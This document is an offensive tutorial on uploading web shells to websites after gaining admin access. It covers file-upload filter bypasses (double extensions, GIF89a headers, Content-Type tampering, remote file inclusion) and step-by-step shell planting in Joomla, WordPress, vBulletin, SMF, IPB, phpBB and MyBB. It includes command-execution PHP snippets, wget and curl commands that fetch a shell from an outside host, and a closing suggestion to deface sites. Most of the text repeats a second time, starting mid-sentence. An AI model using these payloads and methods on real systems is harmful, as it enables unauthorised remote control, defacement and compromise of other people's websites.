SHELL UPLOADING GUIDE: ( Full Tutorial)
Many newbie’s face problem while uploading shell on a site after
getting admin access/ logging in to that site. So, I am writing this in
order to help them.
Basically shell gives us remote access to that server. Such shells are
available in different language like php, asp/aspx, cgi etc.So, we have
to choose a shell that will work on the server according to the server
script. If the server supports php shell then we have to choose any of
the php shell Otherwise asp & cgi.
now, let’s coMe to the Main point….
AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE ,THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some
changes to upload a shell.
Way 1~~~~
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW
UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENSION. If so happens
then just rename the shell name. Add .gif/.jpg/.html/.doc etc.
Example: suppose before renaming the shell name was shell.php, then we
will rename it as shell.php.jpg or anything else.
Way 2~~~~
Upload a simple up loader shell first that isn’t detected by Antivirus
and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN
DOWNLOAD A UP LOADER SHELL FROMhttp://www.rohitroy.my/(three)gb.com/FILE%20UPLOADER.zipWAY 3 ~~~~
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE
headers & don’t allow us to upload a shell. so we can bypass it by using
“GIF89A SHELL SCRIPT BYPASS” Method.
open your shell in notepad. add “GIF89a;” without quote before the shell
code starts. liKe below…
GIF89a;
<?
code...
code...
code...
?>
Depending on what kind of file validation they are using this may fool
the Server Into thinking its a image since when it reads the file it finds
the gif header and assuMes its safe since it’s a iMage.
WAY4~~~~
this method is more advanced. This only works for client side filters
rather than server side. download firebug for Firefox, then edit the
html of the upload .
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\">
Upload DRP File:
<input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br />
<input type=\"submit\" value=\"Upload File\" />
</form>
Change the filter accept. to *.* or just remove it completely , it will then
let you upload any type of file.
WAY 5~~~~
download “LIVE HTTP HEADERS” add-on first for your Firefox browser.
1. Rename your shell name to shell.php.jpg (or whatever
that site supports. In my case, site supports only jpg file.
That's why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that
upload your shell.
3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two
boxes, but we have to work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then
again click on Reply button.
Now you have successfully done, only thing you have to do is to find the
shell path.
WAY 6~~~~
Find yourself a copy of edjpgcom.exe
"edjpgcom is a free Windows application that allows you to change (or
add) a JPEG comment in a JPEG file."
Usage:
--edjpgcom "filename.jpg"
Now add this to the jpg comment since you wont be able to drop a whole
shell in there due to limits etc.
";
system($_GET['cmd']);
echo "
";
?>
now rename your jpg to .php and upload.
WAY 7~~~~
Another way you can fool the web server into thinking your uploading a
image instead of a php shell is to get Firefox and install the
“tamper-data” Add on then click start tamper and upload your php shell
then tamper the data and change the content-Type from
'application/octet-stream' to 'image/jpeg'.
If u have any problem to upload a shell using tamper-data, then just do a
simple Google search. So many video tutorials on this is available in
web. So I am not explaining this step by step.
WAY 8~~~~
All the above mention way works when we find an upload button on the
site. but when there is no upload button, it’s not easy to upload a shell
there. we can try few things……
We have to find out if there is a edit option of an existing php/asp/aspx
page. If there is a edit option then open that page & delete whole script.
After that, open your shell in notepad. Copy the script, paste to that
page. Finally, save it. Now that link will be your shell.
possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in soMe news, vehicles shelling, cart etc sites, don’t have any option
to upload a file after logging in through admin panel. They only allow
file upload after logging through cpanel.
WAY 9~~~~
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO
EXECUTE A SHELL FROM ANOTHER HOSTING SITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTING SITE LIKEwww.my(three)gb.com,
www.3owl.com, www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shelled site link iswww.example.my(three)gb.com/c99.txt &
YOUR VULNERABLE SITE IS www.site.com3) Now we have to execute this following command to gain shell
access to that site.
http://www.site.com/v2/index.php…4) REPLACE THE SITE LINK IN THE COMMAND ACCORDING TO YOUR SHELL &
VULNERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb,
mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:~~~~~~~~~
After Login into admin-panel u will find Extensions on 5th No. expand this
click on it > template Manager > check on any template (like
beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...done
site.com/templates/template name/index.php
like site.com/templates/beez/index.php2.WordPress:~~~~~~~~~
login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin:
1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (Anything …)
Execution Order: 5
Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean(); Plugin is Active : Yes
4-After the plugin is added, go to the heading “Style and Design”, select
“Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit
Templates.
6-Scroll Forum-home models and expand. Click [Customize] beside FORUM-HOME.
7-Search
Code:
$header
Somewhere near the top. Replace it with:
Code:
$header
$execcod
e
8-Now go to the forum and add after the index.php
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
So it looks like
Code:
http://www.site.com/pathtoforum/index.php?cmd=wgethttp://www.site.com/shell.txt;mv shell.txt shell.php
What this does is shell.txt downloads, and renames shell.php
Now,
the shell must be located in the directory shell.php forums … If not,
then wget is disabled on that server, you can try alternative methods:
Code:
http://www.site.com/pathtoforum/index.php?cmd=curlhttp://www.site.com/shell.txt > shell.php
Code:
http://www.site.com/pathtoforum/index.php?cmd=GEThttp://www.site.com/shell.txt shell.php
4.SMF:~~~~~
login into admin-panel
u need to download any smf theme in zip format and put ur shell.php in it
and save
admin panel > select Themes and Layout > Install a new theme > browse and
upload theme thats have our shell.php smile emoticon
after upload shell will find > site.com/Themes/theme name/shell.php
5.IPB:~~~~
login admin panel > Look and Feel >Manage Languages, choose language > section
(example) public_help
edit:
help.txt
Choose topic from list, or search for a topic
In right box add this code:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv
shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}
When you add it, specify go on bottom
Now we go on:
http://www.site.com/index.php?app=core&module=helpAnd our code we add will be done, and you will get your shell @
www,site.com/cache/shell.php6.phpBB:
~~~~~~login into admin panel > go on styles -> templates -> edit, for Template
file choose faq_body.html
At down of:
<!-- INCLUDE overall_header.html -->
We add:
<!-- PHP -->fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->[php]
And save it.Now go on:
[php]www.site.com/forum/faq.php…l.txt
shell find in site path/shell.php
[/php]
Mybb forum
login admincp > Go to Templates and Styles, find default MyBB Theme is.
Then go to Templates,
expand templates that are used by the current theme.
Find Calendar templates,
click it. Click 'calender'. Above all the html code, paste this:
http://pastebin.com/eV1WngfMsave smile emoticon
shell will b find in site.com/calendar.phpnote: if u got error like "code is danger unable to edit "
then simply paste ur deface code to deface calendar.php
[[-==END==-]]
getting admin access/ logging in to that site. So, I am writing this in
order to help them.
Basically shell gives us remote access to that server. Such shells are
available in different language like php, asp/aspx, cgi etc.So, we have
to choose a shell that will work on the server according to the server
script. If the server supports php shell then we have to choose any of
the php shell Otherwise asp & cgi.
now, let’s coMe to the Main point….
AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE ,THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some
changes to upload a shell.
Way 1~~~~
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW
UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENSION. If so happens
then just rename the shell name. Add .gif/.jpg/.html/.doc etc.
Example: suppose before renaming the shell name was shell.php, then we
will rename it as shell.php.jpg or anything else.
Way 2~~~~
Upload a simple up loader shell first that isn’t detected by Antivirus
and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN
DOWNLOAD A UP LOADER SHELL FROMhttp://www.rohitroy.my/(three)gb.com/FILE%20UPLOADER.zipWAY 3 ~~~~
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE
headers & don’t allow us to upload a shell. so we can bypass it by using
“GIF89A SHELL SCRIPT BYPASS” Method.
open your shell in notepad. add “GIF89a;” without quote before the shell
code starts. liKe below…
GIF89a;
<?
code...
code...
code...
?>
Depending on what kind of file validation they are using this may fool
the Server Into thinking its a image since when it reads the file it finds
the gif header and assuMes its safe since it’s a iMage.
WAY4~~~~
this method is more advanced. This only works for client side filters
rather than server side. download firebug for Firefox, then edit the
html of the upload .
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\">
Upload DRP File:
<input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br />
<input type=\"submit\" value=\"Upload File\" />
</form>
Change the filter accept. to *.* or just remove it completely , it will then
let you upload any type of file.
WAY 5~~~~
download “LIVE HTTP HEADERS” add-on first for your Firefox browser.
1. Rename your shell name to shell.php.jpg (or whatever
that site supports. In my case, site supports only jpg file.
That's why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that
upload your shell.
3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two
boxes, but we have to work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then
again click on Reply button.
Now you have successfully done, only thing you have to do is to find the
shell path.
WAY 6~~~~
Find yourself a copy of edjpgcom.exe
"edjpgcom is a free Windows application that allows you to change (or
add) a JPEG comment in a JPEG file."
Usage:
--edjpgcom "filename.jpg"
Now add this to the jpg comment since you wont be able to drop a whole
shell in there due to limits etc.
";
system($_GET['cmd']);
echo "
";
?>
now rename your jpg to .php and upload.
WAY 7~~~~
Another way you can fool the web server into thinking your uploading a
image instead of a php shell is to get Firefox and install the
“tamper-data” Add on then click start tamper and upload your php shell
then tamper the data and change the content-Type from
'application/octet-stream' to 'image/jpeg'.
If u have any problem to upload a shell using tamper-data, then just do a
simple Google search. So many video tutorials on this is available in
web. So I am not explaining this step by step.
WAY 8~~~~
All the above mention way works when we find an upload button on the
site. but when there is no upload button, it’s not easy to upload a shell
there. we can try few things……
We have to find out if there is a edit option of an existing php/asp/aspx
page. If there is a edit option then open that page & delete whole script.
After that, open your shell in notepad. Copy the script, paste to that
page. Finally, save it. Now that link will be your shell.
possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in soMe news, vehicles shelling, cart etc sites, don’t have any option
to upload a file after logging in through admin panel. They only allow
file upload after logging through cpanel.
WAY 9~~~~
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO
EXECUTE A SHELL FROM ANOTHER HOSTING SITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTING SITE LIKEwww.my(three)gb.com,
www.3owl.com, www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shelled site link iswww.example.my(three)gb.com/c99.txt &
YOUR VULNERABLE SITE IS www.site.com3) Now we have to execute this following command to gain shell
access to that site.
http://www.site.com/v2/index.php…4) REPLACE THE SITE LINK IN THE COMMAND ACCORDING TO YOUR SHELL &
VULNERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb,
mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:~~~~~~~~~
After Login into admin-panel u will find Extensions on 5th No. expand this
click on it > template Manager > check on any template (like
beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...done
site.com/templates/template name/index.php
like site.com/templates/beez/index.php2.WordPress:~~~~~~~~~
login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin:
1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (Anything …)
Execution Order: 5
Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean(); Plugin is Active : Yes
4-After the plugin is added, go to the heading “Style and Design”, select
“Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit
Templates.
6-Scroll Forum-home models and expand. Click [Customize] beside FORUM-HOME.
7-Search
Code:
$header
Somewhere near the top. Replace it with:
Code:
$header
$execcod
e
8-Now go to the forum and add after the index.php
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
So it looks like
Code:
http://www.site.com/pathtoforum/index.php?cmd=wgethttp://www.site.com/shell.txt;mv shell.txt shell.php
What this does is shell.txt downloads, and renames shell.php
Now,
the shell must be located in the directory shell.php forums … If not,
then wget is disabled on that server, you can try alternative methods:
Code:
http://www.site.com/pathtoforum/index.php?cmd=curlhttp://www.site.com/shell.txt > shell.php
Code:
http://www.site.com/pathtoforum/index.php?cmd=GEThttp://www.site.com/shell.txt shell.php
4.SMF:~~~~~
login into admin-panel
u need to download any smf theme in zip format and put ur shell.php in it
and save
admin panel > select Themes and Layout > Install a new theme > browse and
upload theme thats have our shell.php smile emoticon
after upload shell will find > site.com/Themes/theme name/shell.php
5.IPB:~~~~
login admin panel > Look and Feel >Manage Languages, choose language > section
(example) public_help
edit:
help.txt
Choose topic from list, or search for a topic
In right box add this code:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv
shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}
When you add it, specify go on bottom
Now we go on:
http://www.site.com/index.php?app=core&module=helpAnd our code we add will be done, and you will get your shell @
www,site.com/cache/shell.php6.phpBB:
~~~~~~login into admin panel > go on styles -> templates -> edit, for Template
file choose faq_body.html
At down of:
<!-- INCLUDE overall_header.html -->
We add:
<!-- PHP -->fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->[php]
And save it.Now go on:
[php]www.site.com/forum/faq.php…l.txt
shell find in site path/shell.php
[/php]
Mybb forum
login admincp > Go to Templates and Styles, find default MyBB Theme is.
Then go to Templates,
expand templates that are used by the current theme.
Find Calendar templates,
click it. Click 'calender'. Above all the html code, paste this:
http://pastebin.com/eV1WngfMsave smile emoticon
shell will b find in site.com/calendar.phpnote: if u got error like "code is danger unable to edit "
then simply paste ur deface code to deface calendar.php
[[-==END==-]]
